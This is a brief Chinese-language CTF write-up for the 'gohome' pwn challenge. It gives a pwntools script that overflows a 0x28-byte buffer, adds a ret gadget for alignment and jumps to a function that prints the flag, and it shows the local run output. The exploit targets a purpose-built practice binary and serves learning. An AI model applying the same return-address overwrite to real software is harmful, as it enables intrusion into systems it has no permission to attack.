Pwnctf gohome Writeup

kazma 成大資安社 創辦人/社長
  2023-12-20 21:16:27 2023-12-20 21:16:27 Created   2023-12-20 21:25:57 2023-12-20 21:25:57 Updated    

gohome

執行看一下:

gohome

他說要找他家的地址:

house

找到他家了,內容是直接在 shell 印出我們的 flag,補上一個 return 對齊一下,exploit.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
└─$ cat exploit.py
from pwn import *

context.arch = 'amd64'
r = process('./gohome')

house = 0x4006c6
ret = 0x400541

p = flat(
    b'a'*0x28,
    ret,
    house
)
r.sendlineafter('?', p)
r.interactive()

result:

1
2
3
4
5
6
7
└─$ python exploit.py
[+] Starting local process './gohome': pid 301052
/home/kazmatw/.local/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[*] Switching to interactive mode
cat: /home/ctf/flag: No such file or directory
[*] Got EOF while reading in interactive

可以看到他執行了 cat /home/ctf/flag,不過因為是在 local 跑沒有這個資料夾所以 eof 了

Pwned !!!

  • Title: Pwnctf gohome Writeup
  • Author: kazma
  • Created at : 2023-12-20 21:16:27
  • Updated at : 2023-12-20 21:25:57
  • Link: https://kazma.tw/2023/12/20/Pwnctf-gohome-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
Pwnctf gohome Writeup
  1. gohome